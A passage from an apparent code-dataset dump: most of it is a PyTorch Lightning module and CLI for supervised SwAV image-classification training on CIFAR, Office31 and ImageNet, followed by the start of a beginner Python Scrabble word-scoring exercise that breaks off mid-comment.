soft assignment (q) should be matched with the j'th cosine_similarity\r\n # i is in [0, bs), while j is in [0, sum(self.nmb_crops) * bs)\r\n # because assignments are only made for one crop per loop iteration, and cosine_similarities (`output`/`p`) are available for all crops at the same time\r\n classes_matching_index_not_matching = torch.cat([torch.stack([labels == label for label in labels]) for _ in range(sum(self.nmb_crops))], dim=1)\r\n\r\n # don't match to the exact same image itself (note that this only excludes this exact crop of the image, not the other crops of multi-crop)\r\n for i in range(bs):\r\n classes_matching_index_not_matching[i, crop_id*bs + i] = False\r\n\r\n swav_loss += torch.mean(potential_sublosses[classes_matching_index_not_matching])\r\n\r\n else:\r\n subloss = 0\r\n for v in np.delete(np.arange(np.sum(self.nmb_crops)), crop_id):\r\n p = self.softmax(output[bs * v:bs * (v + 1)] / self.temperature)\r\n subloss -= torch.mean(torch.sum(q * torch.log(p), dim=1))\r\n swav_loss += subloss / (np.sum(self.nmb_crops) - 1)\r\n\r\n swav_loss /= len(self.crops_for_assign)\r\n else:\r\n # supervised only\r\n logits = self.model(inputs)\r\n\r\n ce_loss = 0\r\n if len(inputs) != sum(self.nmb_crops):\r\n ## Supervised\r\n ce_loss = F.cross_entropy(logits, labels)\r\n acc_metric(logits, labels)\r\n\r\n joint_loss = swav_loss + self.supervised_weight * ce_loss\r\n\r\n return ce_loss, swav_loss, joint_loss\r\n\r\n def training_step(self, batch, batch_idx, optimizer_idx=0):\r\n if optimizer_idx == 0:\r\n ce_loss, swav_loss, joint_loss = self.shared_step(batch, self.train_acc) #, self.train_conf_mat)\r\n\r\n self.log('train/ce_loss', ce_loss, on_step=True, on_epoch=False)\r\n self.log('train/swav_loss', swav_loss, on_step=True, on_epoch=False)\r\n self.log('train/joint_loss', joint_loss, on_step=True, on_epoch=False)\r\n\r\n self.log('train/acc', self.train_acc, prog_bar=True)\r\n\r\n if self.prototype_entropy_regularization_type == 'same_optimizer' and self.prototype_entropy_regularization_weight != 0:\r\n joint_loss = joint_loss + self.prototype_entropy_regularization_weight * self.get_regularization_term()\r\n\r\n return joint_loss\r\n elif optimizer_idx == 1:\r\n return self.get_regularization_term()\r\n\r\n def get_regularization_term(self):\r\n prototype_classifications = self.softmax(\r\n self.model.supervised_head(self.model.prototypes.weight)\r\n )\r\n # average entropy of each individual prototype classification (marginal entropy)\r\n # -> minimize to have prototypes that closely resemble actual classes\r\n proto_entropy = torch.mean(-torch.sum(prototype_classifications * torch.log(prototype_classifications), dim=1))\r\n self.log('train/prototype_classification_entropy', proto_entropy, on_step=True, on_epoch=False)\r\n\r\n # entropy of all classifcations averaged -> maximize to have each class represented an equal number of times\r\n classification_mean = torch.mean(prototype_classifications, dim=0)\r\n mean_classification_entropy = -torch.sum(classification_mean * torch.log(classification_mean))\r\n self.log('train/proto_mean_classification_entropy', mean_classification_entropy, on_step=True, on_epoch=False)\r\n\r\n return proto_entropy - mean_classification_entropy\r\n\r\n def validation_step(self, batch, batch_idx, dataloader_id=None):\r\n if dataloader_id is not None:\r\n dataloader_name = self.val_names[dataloader_id]\r\n\r\n ce_loss, swav_loss, joint_loss = self.shared_step(\r\n batch,\r\n self.val_acc if dataloader_id is None else getattr(self, f'{dataloader_name}_val_acc')\r\n )\r\n\r\n slash_dataloader_name = f'/{dataloader_name}' if dataloader_id is not None else ''\r\n self.log(f'val{slash_dataloader_name}/ce_loss', ce_loss, on_step=False, on_epoch=True, add_dataloader_idx=False)\r\n self.log(f'val{slash_dataloader_name}/swav_loss', swav_loss, on_step=False, on_epoch=True, add_dataloader_idx=False)\r\n self.log(f'val{slash_dataloader_name}/joint_loss', joint_loss, on_step=False, on_epoch=True, add_dataloader_idx=False)\r\n\r\n self.log(\r\n f'val{slash_dataloader_name}/acc',\r\n self.val_acc if dataloader_id is None else getattr(self, f'{dataloader_name}_val_acc'),\r\n add_dataloader_idx=False\r\n )\r\n\r\n return joint_loss\r\n\r\n def test_step(self, batch, batch_idx):\r\n inputs, labels = batch\r\n assert not isinstance(inputs, list), \"Test data should not be multi-cropped\"\r\n\r\n logits = self.model(inputs)\r\n ce_loss = F.cross_entropy(logits, labels)\r\n self.test_acc(logits, labels)\r\n\r\n self.log('test/ce_loss', ce_loss, on_step=False, on_epoch=True)\r\n self.log('test/acc', self.test_acc)\r\n\r\n return ce_loss\r\n\r\n def scale_backbone_lr(self, named_params, learning_rate, scale_factor=0.1):\r\n backbone_params = []\r\n head_params = []\r\n\r\n for name, param in named_params:\r\n if not param.requires_grad:\r\n continue\r\n elif any(layer_name in name for layer_name in ('shared_head', 'supervised_head', 'projection_head', 'prototypes')):\r\n head_params.append(param)\r\n else:\r\n backbone_params.append(param)\r\n\r\n return [{'params': head_params, 'lr': learning_rate}, {'params': backbone_params, 'lr': learning_rate*scale_factor}]\r\n\r\n def configure_optimizers(self):\r\n if self.backbone_lr_scaling != 1:\r\n params = self.scale_backbone_lr(self.named_parameters(), learning_rate=self.learning_rate, scale_factor=self.backbone_lr_scaling)\r\n else:\r\n params = self.parameters()\r\n\r\n if self.optim == 'lars':\r\n optimizer = LARS(\r\n params,\r\n lr=self.learning_rate,\r\n momentum=0.9,\r\n weight_decay=self.weight_decay,\r\n trust_coefficient=0.001,\r\n )\r\n elif self.optim == 'adam':\r\n optimizer = torch.optim.Adam(params, lr=self.learning_rate, weight_decay=self.weight_decay)\r\n elif self.optim == 'sgd':\r\n optimizer = torch.optim.SGD(params, lr=self.learning_rate, momentum=0.9, weight_decay=self.weight_decay)\r\n\r\n warmup_steps = self.train_iters_per_epoch * self.warmup_epochs\r\n total_steps = self.train_iters_per_epoch * self.max_epochs\r\n\r\n scheduler = {\r\n \"scheduler\": torch.optim.lr_scheduler.LambdaLR(\r\n optimizer,\r\n linear_warmup_decay(warmup_steps, total_steps, decay_type=self.lr_schedule_type),\r\n ),\r\n \"interval\": \"step\",\r\n \"frequency\": 1,\r\n }\r\n\r\n if self.prototype_entropy_regularization_type == 'separate_optimizer' and self.prototype_entropy_regularization_weight != 0:\r\n prototype_parameters = [param for name, param in self.named_parameters() if 'prototypes' in name]\r\n regularization_lr = self.learning_rate * self.prototype_entropy_regularization_weight\r\n\r\n if self.optim == 'lars':\r\n prototype_entropy_optimizer = LARS(\r\n prototype_parameters,\r\n lr=regularization_lr,\r\n momentum=0.9,\r\n weight_decay=self.weight_decay,\r\n trust_coefficient=0.001,\r\n )\r\n elif self.optim == 'adam':\r\n prototype_entropy_optimizer = torch.optim.Adam(prototype_parameters, lr=regularization_lr, weight_decay=self.weight_decay)\r\n elif self.optim == 'sgd':\r\n prototype_entropy_optimizer = torch.optim.SGD(prototype_parameters, lr=regularization_lr, momentum=0.9, weight_decay=self.weight_decay)\r\n\r\n prototype_entropy_scheduler = {\r\n \"scheduler\": torch.optim.lr_scheduler.LambdaLR(\r\n prototype_entropy_optimizer,\r\n linear_warmup_decay(warmup_steps, total_steps, decay_type=self.lr_schedule_type),\r\n ),\r\n \"interval\": \"step\",\r\n \"frequency\": 1,\r\n }\r\n\r\n return [optimizer, prototype_entropy_optimizer], [scheduler, prototype_entropy_scheduler]\r\n\r\n return [optimizer], [scheduler]\r\n\r\n def sinkhorn(self, Q, nmb_iters):\r\n with torch.no_grad():\r\n sum_Q = torch.sum(Q)\r\n Q /= sum_Q\r\n\r\n K, B = Q.shape\r\n\r\n if self.gpus > 0:\r\n u = torch.zeros(K).cuda()\r\n r = torch.ones(K).cuda() / K\r\n c = torch.ones(B).cuda() / B\r\n else:\r\n u = torch.zeros(K)\r\n r = torch.ones(K) / K\r\n c = torch.ones(B) / B\r\n\r\n for _ in range(nmb_iters):\r\n u = torch.sum(Q, dim=1)\r\n\r\n Q *= (r / u).unsqueeze(1)\r\n Q *= (c / torch.sum(Q, dim=0)).unsqueeze(0)\r\n\r\n return (Q / torch.sum(Q, dim=0, keepdim=True)).t().float()\r\n\r\n def distributed_sinkhorn(self, Q, nmb_iters):\r\n with torch.no_grad():\r\n sum_Q = torch.sum(Q)\r\n dist.all_reduce(sum_Q)\r\n Q /= sum_Q\r\n\r\n if self.gpus > 0:\r\n u = torch.zeros(Q.shape[0]).cuda(non_blocking=True)\r\n r = torch.ones(Q.shape[0]).cuda(non_blocking=True) / Q.shape[0]\r\n c = torch.ones(Q.shape[1]).cuda(non_blocking=True) / (self.gpus * Q.shape[1])\r\n else:\r\n u = torch.zeros(Q.shape[0])\r\n r = torch.ones(Q.shape[0]) / Q.shape[0]\r\n c = torch.ones(Q.shape[1]) / (self.gpus * Q.shape[1])\r\n\r\n curr_sum = torch.sum(Q, dim=1)\r\n dist.all_reduce(curr_sum)\r\n\r\n for it in range(nmb_iters):\r\n u = curr_sum\r\n Q *= (r / u).unsqueeze(1)\r\n Q *= (c / torch.sum(Q, dim=0)).unsqueeze(0)\r\n curr_sum = torch.sum(Q, dim=1)\r\n dist.all_reduce(curr_sum)\r\n return (Q / torch.sum(Q, dim=0, keepdim=True)).t().float()\r\n\r\n @staticmethod\r\n def add_model_specific_args(parent_parser):\r\n def true_false(arg):\r\n if arg == 'True':\r\n return True\r\n elif arg == 'False':\r\n return False\r\n else:\r\n raise ValueError()\r\n\r\n def list_from_string(dtype):\r\n def f(arg):\r\n val_list = ast.literal_eval(arg)\r\n if type(val_list) is not list or len(val_list) == 0:\r\n raise ValueError(f'{arg} is an invalid representation for a list')\r\n # check whether all elements can be interpreted as an object of type dtype\r\n for x in val_list:\r\n dtype(x)\r\n return val_list\r\n\r\n f.__name__ = f'{dtype.__name__}_list'\r\n return f\r\n\r\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\r\n\r\n # model params\r\n parser.add_argument(\"--arch\", default=\"resnet50\", type=str, help=\"convnet architecture\")\r\n parser.add_argument(\"--imagenet_pretrained\", default=False, type=true_false,\r\n help=\"Whether to initialize convnet with pretrained imagenet weights. Only available for resnet50\"\r\n )\r\n parser.add_argument('--pretrained_checkpoint', default=None, type=str,\r\n help=\"checkpoint to load pretrained weights from. If none is provided, one from pytorch's model_zoo will be used\"\r\n )\r\n parser.add_argument('--old_pretrained_weights', default=False, type=true_false,\r\n help='If --imagenet_pretrained is True: whether to use older pretrained weights from Jan 2017, or newer ones from Mar 2021. Otherwise: no effect.'\r\n )\r\n # specify flags to store false\r\n parser.add_argument(\"--first_conv\", action='store_false')\r\n parser.add_argument(\"--maxpool1\", action='store_false')\r\n parser.add_argument(\"--norm_layer\", type=str, default='batch_norm', action='store', help='batch_norm, group_norm')\r\n parser.add_argument(\"--num_groups\", type=int, default=16, action='store',\r\n help='in case group_norm is chosen as norm_layer, this sets the number of groups'\r\n )\r\n parser.add_argument(\"--hidden_mlp\", default=2048, type=int, help=\"hidden layer dimension in projection head\")\r\n parser.add_argument(\"--feat_dim\", default=128, type=int, help=\"feature dimension\")\r\n parser.add_argument(\"--fp32\", action='store_true')\r\n\r\n # transform params\r\n parser.add_argument(\"--gaussian_blur\", type=true_false, action='store', default=False, help=\"add gaussian blur\")\r\n parser.add_argument(\"--jitter_strength\", type=float, default=1.0, help=\"jitter strength\")\r\n parser.add_argument(\"--dataset\", type=str, default=\"cifar10\", help=\"cifar10, cifar100, office31, imagenet\")\r\n parser.add_argument(\"--data_dir\", type=str, default=\".\", help=\"path to download data\")\r\n\r\n parser.add_argument(\r\n \"--nmb_crops\", type=list_from_string(int), default=[2, 4], help=\"list of number of crops (example: [2, 6])\"\r\n )\r\n parser.add_argument(\r\n \"--size_crops\", type=list_from_string(int), default=[96, 36], help=\"crops resolutions (example: [224, 96])\"\r\n )\r\n parser.add_argument(\r\n \"--min_scale_crops\",\r\n type=list_from_string(float),\r\n default=[0.33, 0.10],\r\n help=\"argument in RandomResizedCrop (example: [0.14, 0.05])\",\r\n )\r\n parser.add_argument(\r\n \"--max_scale_crops\",\r\n type=list_from_string(float),\r\n default=[1, 0.33],\r\n help=\"argument in RandomResizedCrop (example: [1., 0.14])\",\r\n )\r\n\r\n # training params\r\n parser.add_argument(\"--fast_dev_run\", default=1, type=int)\r\n parser.add_argument(\"--num_nodes\", default=1, type=int, help=\"number of nodes for training\")\r\n parser.add_argument(\"--gpus\", default=1, type=int, help=\"number of gpus to train on\")\r\n parser.add_argument(\"--num_workers\", default=8, type=int, help=\"num of workers per GPU\")\r\n parser.add_argument(\"--optimizer\", default=\"adam\", type=str, help=\"choose between adam/lars/sgd\")\r\n parser.add_argument(\"--max_epochs\", default=100, type=int, help=\"number of total epochs to run\")\r\n parser.add_argument(\"--max_steps\", default=-1, type=int, help=\"max steps\")\r\n parser.add_argument(\"--warmup_epochs\", default=10, type=int, help=\"number of warmup epochs\")\r\n parser.add_argument(\"--batch_size\", default=128, type=int, help=\"batch size per gpu\")\r\n\r\n parser.add_argument(\"--weight_decay\", default=1e-6, type=float, help=\"weight decay\")\r\n parser.add_argument(\"--learning_rate\", default=1e-3, type=float, help=\"base learning rate\")\r\n parser.add_argument(\"--start_lr\", default=0, type=float, help=\"initial warmup learning rate\")\r\n parser.add_argument(\"--final_lr\", type=float, default=1e-6, help=\"final learning rate\")\r\n parser.add_argument(\"--backbone_lr_scaling\", type=float, default=1.0, help=\"factor to scale the backbone learning rate with\")\r\n parser.add_argument('--lr_schedule_type', default='cosine', type=str, choices=['constant', 'linear', 'cosine', 'inv_prop'])\r\n\r\n # swav params\r\n parser.add_argument(\r\n \"--crops_for_assign\",\r\n type=list_from_string(int),\r\n default=[0, 1],\r\n help=\"list of crops id used for computing assignments\",\r\n )\r\n parser.add_argument(\"--temperature\", default=0.1, type=float, help=\"temperature parameter in training loss\")\r\n parser.add_argument(\r\n \"--epsilon\", default=0.05, type=float, help=\"regularization parameter for Sinkhorn-Knopp algorithm\"\r\n )\r\n parser.add_argument(\r\n \"--sinkhorn_iterations\", default=3, type=int, help=\"number of iterations in Sinkhorn-Knopp algorithm\"\r\n )\r\n parser.add_argument(\"--nmb_prototypes\", default=512, type=int, help=\"number of prototypes\")\r\n parser.add_argument(\r\n \"--queue_length\",\r\n type=int,\r\n default=0,\r\n help=\"length of the queue (0 for no queue); must be divisible by total batch size\"\r\n )\r\n parser.add_argument(\r\n \"--epoch_queue_starts\", type=int, default=15, help=\"from this epoch, we start using a queue\"\r\n )\r\n parser.add_argument(\r\n \"--freeze_prototypes_epochs\",\r\n default=1,\r\n type=int,\r\n help=\"freeze the prototypes during this many epochs from the start\"\r\n )\r\n\r\n parser.add_argument('--supervised_only', type=true_false, action='store', default=False, help='train only using the supervised head')\r\n parser.add_argument('--supervised_hidden_mlp', type=int, default=2048, help='hidden layer of non-linear supervised learning head')\r\n parser.add_argument('--supervised_weight', type=float, default=1., help='weighting factor of supervised loss')\r\n parser.add_argument('--supervised_transforms', type=str, default='default',\r\n choices=['default', 'larger_crop', 'cifar10_transforms'], help='default, larger_crop, cifar10_transforms'\r\n )\r\n parser.add_argument('--supervised_crop_size', type=int, default=-1,\r\n help=('(square) size to crop the images used for supervised training to. '\r\n 'Defaults to the larger one of the multi-crop sizes (usually a sensible choice for best alignment between the swav and supervised objectives). '\r\n 'Needs to be specified for supervised only training. '\r\n 'Note that \"cifar10_transforms\" ignores this argument and always crops to 32x32.')\r\n )\r\n\r\n parser.add_argument('--share_hidden_mlp', type=true_false, default=False,\r\n help=(\"Whether supervised head and swav's projection head should share their hidden layer. If this is set to True, \"\r\n '\"--supervised_hidden_mlp\" will have no effect, and \"--hidden_mlp\" will define the size of the hidden layer used by both heads.')\r\n )\r\n parser.add_argument('--supervised_head_after_proj_head', type=true_false, default=False,\r\n help=(\"Whether to change the architecture such that the supervised head attaches after swav's projection head and the l2norm, \"\r\n 'making the projection head part of the shared parameters. This makes the inputs of the supervised head be in the same space '\r\n 'as the prototypes, which is necessary to perform prototype entropy regularization. '\r\n 'If this is set to True, \"--share_hidden_mlp\" must be set to False.')\r\n )\r\n\r\n parser.add_argument('--prototype_entropy_regularization_weight', type=float, default=0,\r\n help=('Weight of the regularization term that minimizes marginal prototype entropy and maximizes mean prototype entropy. '\r\n 'If a separate optimizer is used, this is simply a factor by which its learning rate is smaller than the first optimizer, '\r\n 'otherwise its a factor the regularization term gets multiplied with before adding it to the total loss. '\r\n 'The default of 0 implicates NO regularization. '\r\n 'If this value is set to >0, \"--supervised_head_after_proj_head\" is required to be set to True.')\r\n )\r\n parser.add_argument('--prototype_entropy_regularization_type', type=str, default='same_optimizer', choices=['separate_optimizer', 'same_optimizer'],\r\n help='If a separate optimizer is used, this optimizer ONLY optimizes the prototypes, otherwise the supervised head is also affected by the regularization'\r\n )\r\n\r\n parser.add_argument('--supervised_contrastive', type=true_false, action='store', default=False,\r\n help='Whether to use labels in order to treat samples with the same label as positives for the swav loss'\r\n )\r\n\r\n return parser\r\n\r\n\r\ndef cli_main():\r\n from pl_bolts.datamodules import CIFAR10DataModule, ImagenetDataModule, STL10DataModule\r\n from cifar100_datamodule import CIFAR100DataModule\r\n from Office31 import Office31DataModule\r\n from pl_bolts.models.self_supervised.swav.transforms import SwAVEvalDataTransform, SwAVTrainDataTransform\r\n from pytorch_lightning import loggers as pl_loggers\r\n from torchvision import transforms as transforms\r\n\r\n parser = ArgumentParser(allow_abbrev=False)\r\n\r\n parser.add_argument('--wandb_project', default='uncategorized', type=str, help='name of the wandb project to save this run in')\r\n parser.add_argument('--wandb_log_dir', default='wandb_logs', type=str, help='directory to save wandb logs in')\r\n parser.add_argument('--hyperparameter_checkpoint', type=str,\r\n help=(\r\n 'A checkpoint can be specified the hyperparameters of which will be extracted and used for this run. '\r\n 'Parameters can still be overwritten using the command line arguments. '\r\n 'Basically, the hyperparameters of this checkpoint act as the default values of the arguments (instead of the hard-coded ones). '\r\n )\r\n )\r\n parser.add_argument('--wandb_run_name', default=None, type=str, help='custom name for this run in wandb')\r\n parser.add_argument('--hyperparameter_artifact', type=str,\r\n help='The same as \"--hyperparameter_checkpoint\", but the checkpoint is specified as a wandb artifact'\r\n )\r\n parser.add_argument('--artifact_dir', type=str, action='store', default='wandb_artifacts', help='directory to save wandb artifacts in')\r\n parser.add_argument('--wandb_entity', type=str, help='name of the wandb entity (account) to load an artifact from')\r\n parser.add_argument('--logger_prefix', default='supervised_swav', type=str,\r\n help='prefix to the name of all the logged metrics (empty string for no prefix)',\r\n )\r\n\r\n # model args\r\n parser = SupervisedSwAV.add_model_specific_args(parser)\r\n args = parser.parse_args()\r\n\r\n assert (args.hyperparameter_checkpoint is None) or (args.hyperparameter_artifact is None), \\\r\n 'Only hyperparameter_checkpoint or hyperparameter_artifact can be specified'\r\n\r\n if args.hyperparameter_checkpoint is not None:\r\n assert os.path.isfile(args.hyperparameter_checkpoint), 'The specified checkpoint file does not exist'\r\n\r\n logger = pl_loggers.WandbLogger(\r\n save_dir=args.wandb_log_dir,\r\n project=args.wandb_project,\r\n prefix=args.logger_prefix,\r\n log_model=True,\r\n )\r\n logger.LOGGER_JOIN_CHAR = '/'\r\n\r\n if args.hyperparameter_artifact is not None:\r\n assert args.wandb_entity is not None, \"Need to specify a wandb_entity to load an artifact\"\r\n artifact_dirname = args.hyperparameter_artifact.replace(\":\", \"-\")\r\n\r\n if type(logger.experiment) is not pl_loggers.base.DummyExperiment:\r\n artifact = logger.experiment.use_artifact(f'{args.wandb_entity}/{args.wandb_project}/{args.hyperparameter_artifact}', type='model')\r\n if not os.path.isdir(os.path.join(args.artifact_dir, artifact_dirname)):\r\n # artifact has not been downloaded yet -> download artifact and store its path in hyperparameter_checkpoint\r\n args.hyperparameter_checkpoint = os.path.join(\r\n artifact.download(os.path.join(\r\n args.artifact_dir,\r\n artifact_dirname\r\n )),\r\n 'model.ckpt'\r\n )\r\n else:\r\n # artifact is already downloaded, because it was used before -> just store its path in hyperparameter_checkpoint\r\n args.hyperparameter_checkpoint = os.path.join(\r\n args.artifact_dir,\r\n artifact_dirname,\r\n 'model.ckpt'\r\n )\r\n else:\r\n # we got a DummyExperiment -> we are not rank 0\r\n # wait until the rank 0 process downloaded the artifact, then use it to obtain the hyperparameters\r\n while not os.path.isdir(os.path.join(args.artifact_dir, artifact_dirname)):\r\n pass\r\n # now the file exists, but it might still be in the process of downloading\r\n args.hyperparameter_checkpoint = os.path.join(\r\n args.artifact_dir,\r\n artifact_dirname,\r\n 'model.ckpt'\r\n )\r\n\r\n if args.hyperparameter_checkpoint is not None:\r\n while True:\r\n try:\r\n hyperparameters = load_checkpoint(args.hyperparameter_checkpoint)['hyper_parameters']\r\n break\r\n except:\r\n print('Waiting for download...')\r\n sleep(1)\r\n\r\n # overwrite arguments that were explicitly specified in the command line\r\n hyperparameters.update({k: v for k, v in args.__dict__.items() if any(f'--{k}' in arg for arg in sys.argv)})\r\n # * this assumes \"_\" in argument names, NOT \"-\"\r\n # * and it assumes no shortcut names for arguments\r\n\r\n args.__dict__ = hyperparameters\r\n\r\n assert not (args.supervised_only and args.supervised_contrastive), 'No contrastive objective present when training purely supervised'\r\n\r\n logger.experiment.name = '/'.join([\r\n args.dataset,\r\n \"supervised\" if args.supervised_only else \"supervised_swav\"] +\r\n ([args.hyperparameter_artifact] if 'hyperparameter_artifact' in args.__dict__ and args.hyperparameter_artifact is not None else ([os.path.basename(args.hyperparameter_checkpoint)] if 'hyperparameter_checkpoint' in args.__dict__ and args.hyperparameter_checkpoint is not None else [])) +\r\n ([args.wandb_run_name] if args.wandb_run_name else [])\r\n )\r\n\r\n if args.dataset == 'stl10':\r\n raise NotImplementedError(\"stl10 has not yet been implemented for the supervised setting\")\r\n dm = STL10DataModule(data_dir=args.data_dir, batch_size=args.batch_size, num_workers=args.num_workers)\r\n\r\n dm.train_dataloader = dm.train_dataloader_mixed\r\n dm.val_dataloader = dm.val_dataloader_mixed\r\n args.num_samples = dm.num_unlabeled_samples\r\n\r\n args.maxpool1 = False\r\n\r\n normalization = stl10_normalization()\r\n elif args.dataset == 'cifar10':\r\n dm = CIFAR10DataModule(data_dir=args.data_dir, batch_size=args.batch_size, num_workers=args.num_workers)\r\n\r\n args.num_samples = dm.num_samples\r\n\r\n args.maxpool1 = False\r\n args.first_conv = False\r\n\r\n normalization = cifar10_normalization()\r\n elif args.dataset == 'cifar100':\r\n dm = CIFAR100DataModule(data_dir=args.data_dir, batch_size=args.batch_size, num_workers=args.num_workers)\r\n\r\n args.num_samples = dm.num_samples\r\n\r\n args.maxpool1 = False\r\n args.first_conv = False\r\n\r\n normalization = cifar10_normalization()\r\n elif args.dataset.startswith('office31'):\r\n if len(args.dataset) < 9 or args.dataset[8] != ':':\r\n raise ValueError('Violated expected format for office31 dataset name: \"office31:\", e.g.\"office31:amazon\"')\r\n\r\n train_domain = args.dataset[9:]\r\n dm = Office31DataModule(data_dir=args.data_dir, batch_size=args.batch_size, num_workers=args.num_workers, domain=train_domain, val_split=0)\r\n args.num_samples = dm.num_samples\r\n\r\n normalization = imagenet_normalization()\r\n\r\n # use training sets of the other domains as validation during training on this domain\r\n val_domains = [domain for domain in ('amazon', 'dslr', 'webcam') if domain != train_domain]\r\n val_dataloaders = []\r\n for domain in val_domains:\r\n val_dm = Office31DataModule(data_dir=args.data_dir, batch_size=args.batch_size, num_workers=args.num_workers, domain=domain, val_split=0.2)\r\n\r\n val_dm.train_transforms = SwAVEvalDataTransform(\r\n normalize=normalization,\r\n size_crops=args.size_crops,\r\n nmb_crops=args.nmb_crops,\r\n min_scale_crops=args.min_scale_crops,\r\n max_scale_crops=args.max_scale_crops,\r\n gaussian_blur=args.gaussian_blur,\r\n jitter_strength=args.jitter_strength\r\n )\r\n if args.supervised_only:\r\n val_dm.train_transforms.transform = [val_dm.train_transforms.transform[-1]]\r\n val_dm.train_transforms.transform[-1] = transforms.Compose([\r\n transforms.ToTensor(),\r\n normalization,\r\n ])\r\n val_dm.setup(stage='fit')\r\n\r\n val_dataloaders.append(val_dm.train_dataloader())\r\n\r\n dm.val_dataloader = lambda: val_dataloaders\r\n args.val_names = val_domains\r\n\r\n elif args.dataset == 'imagenet':\r\n args.maxpool1 = True\r\n args.first_conv = True\r\n normalization = imagenet_normalization()\r\n\r\n args.size_crops = [224, 96]\r\n args.nmb_crops = [2, 6]\r\n args.min_scale_crops = [0.14, 0.05]\r\n args.max_scale_crops = [1., 0.14]\r\n args.gaussian_blur = True\r\n args.jitter_strength = 1.\r\n\r\n args.batch_size = 64\r\n args.num_nodes = 8\r\n args.gpus = 8 # per-node\r\n args.max_epochs = 800\r\n\r\n args.optimizer = 'lars'\r\n args.learning_rate = 4.8\r\n args.final_lr = 0.0048\r\n args.start_lr = 0.3\r\n\r\n args.nmb_prototypes = 3000\r\n\r\n dm = ImagenetDataModule(data_dir=args.data_dir, batch_size=args.batch_size, num_workers=args.num_workers)\r\n\r\n args.num_samples = dm.num_samples\r\n args.input_height = dm.size()[-1]\r\n else:\r\n raise NotImplementedError(\"other datasets have not been implemented till now\")\r\n\r\n args.num_classes = dm.num_classes\r\n\r\n if args.supervised_only:\r\n # if only supervised training is done, don't create swav-specific layers of resnet\r\n args.nmb_prototypes = 0\r\n if not args.supervised_head_after_proj_head:\r\n args.feat_dim = 0\r\n\r\n dm.train_transforms = SwAVTrainDataTransform(\r\n normalize=normalization,\r\n size_crops=args.size_crops,\r\n nmb_crops=args.nmb_crops,\r\n min_scale_crops=args.min_scale_crops,\r\n max_scale_crops=args.max_scale_crops,\r\n gaussian_blur=args.gaussian_blur,\r\n jitter_strength=args.jitter_strength\r\n )\r\n if args.supervised_only:\r\n dm.train_transforms.transform = [dm.train_transforms.transform[-1]]\r\n\r\n if args.supervised_crop_size < 0:\r\n assert not args.supervised_only, 'For supervised_only, supervised_crop_size needs to be specified'\r\n args.supervised_crop_size = args.size_crops[0]\r\n\r\n # set the augmentation transforms for supervised training\r\n if args.supervised_transforms == 'cifar10_transforms':\r\n args.supervised_crop_size = 32\r\n # the augmentations used for cifar10 in the resnet paper\r\n # https://arxiv.org/pdf/1512.03385.pdf\r\n # or in\r\n # https://github.com/kentaroy47/pytorch-lightning-tryouts/blob/master/cifar10.py\r\n dm.train_transforms.transform[-1] = transforms.Compose([\r\n transforms.RandomCrop(32, padding=4),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n normalization,\r\n ])\r\n elif args.supervised_transforms == 'larger_crop':\r\n dm.train_transforms.transform[-1] = transforms.Compose([\r\n transforms.RandomResizedCrop(args.supervised_crop_size, scale=(0.3125, 1.0)),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n normalization,\r\n ])\r\n else:\r\n # the default ones as defined in SwAVTrainDataTransform:\r\n dm.train_transforms.transform[-1] = transforms.Compose([\r\n transforms.RandomResizedCrop(args.supervised_crop_size),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n normalization,\r\n ])\r\n\r\n dm.val_transforms = SwAVEvalDataTransform(\r\n normalize=normalization,\r\n size_crops=args.size_crops,\r\n nmb_crops=args.nmb_crops,\r\n min_scale_crops=args.min_scale_crops,\r\n max_scale_crops=args.max_scale_crops,\r\n gaussian_blur=args.gaussian_blur,\r\n jitter_strength=args.jitter_strength\r\n )\r\n if args.supervised_only:\r\n dm.val_transforms.transform = [dm.val_transforms.transform[-1]]\r\n\r\n dm.val_transforms.transform[-1] = transforms.Compose([\r\n transforms.ToTensor(),\r\n normalization,\r\n ])\r\n\r\n # swav model init\r\n model = SupervisedSwAV(**args.__dict__)\r\n\r\n lr_monitor = LearningRateMonitor(logging_interval=\"step\")\r\n model_checkpoint = ModelCheckpoint(\r\n save_last=not args.dataset.startswith('office31'),\r\n save_top_k=1,\r\n monitor='val/joint_loss' if not args.dataset.startswith('office31') else\r\n ('val/webcam/joint_loss' if args.dataset.endswith('amazon') else 'val/amazon/joint_loss')\r\n )\r\n callbacks = [model_checkpoint, lr_monitor]\r\n\r\n trainer = pl.Trainer(\r\n max_epochs=args.max_epochs,\r\n max_steps=None if args.max_steps == -1 else args.max_steps,\r\n gpus=args.gpus,\r\n num_nodes=args.num_nodes,\r\n distributed_backend='ddp' if args.gpus > 1 else None,\r\n sync_batchnorm=True if args.gpus > 1 else False,\r\n precision=32 if args.fp32 else 16,\r\n callbacks=callbacks,\r\n fast_dev_run=args.fast_dev_run,\r\n logger=logger,\r\n )\r\n\r\n trainer.fit(model, datamodule=dm)\r\n\r\n\r\nif __name__ == '__main__':\r\n cli_main()\r\n","repo_name":"AlexanderBartler/TTAPS","sub_path":"src/supervised_swav_module.py","file_name":"supervised_swav_module.py","file_ext":"py","file_size_in_byte":54677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73526710451","text":"# Starting code\nletters = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\"]\npoints = [1, 3, 3, 2, 1, 4, 2, 4, 1, 8, 5, 1, 3, 4, 1, 3, 10, 1, 1, 1, 1, 4, 4, 8, 4, 10]\n\n# ===================================\n# Build your Point Dictionary Section\n# ===================================\n# Task 1: Create dictionary using list comprehension and zip\nletter_to_points = {letters:points for letters, points in zip(letters, points)}\n\n# Task 2: Add key value pair to dictionary\nletter_to_points[\" \"] = 0\n\n# ====================\n# Score a Word Section\n# ====================\n# Task 3: Write function score_word\ndef score_word(word):\n # Task 4: Create variable point_total\n point_total = 0\n # Task 5: Iterate through word and add point values to point_total\n for letter in word:\n # Add point value from dictionary to point_total. Default to 0 if letter is not in dictionary\n # Task 15: Extra - Make input work with lowercase letters\n point_total += letter_to_points.get(letter.upper(), 0)\n # Task 6: Return point_total\n return point_total\n# Task 7: Test score_word function with BROWNIE\nbrownie_points = score_word(\"BROWNIE\")\n# Task 8: Print brownie_points. Should print 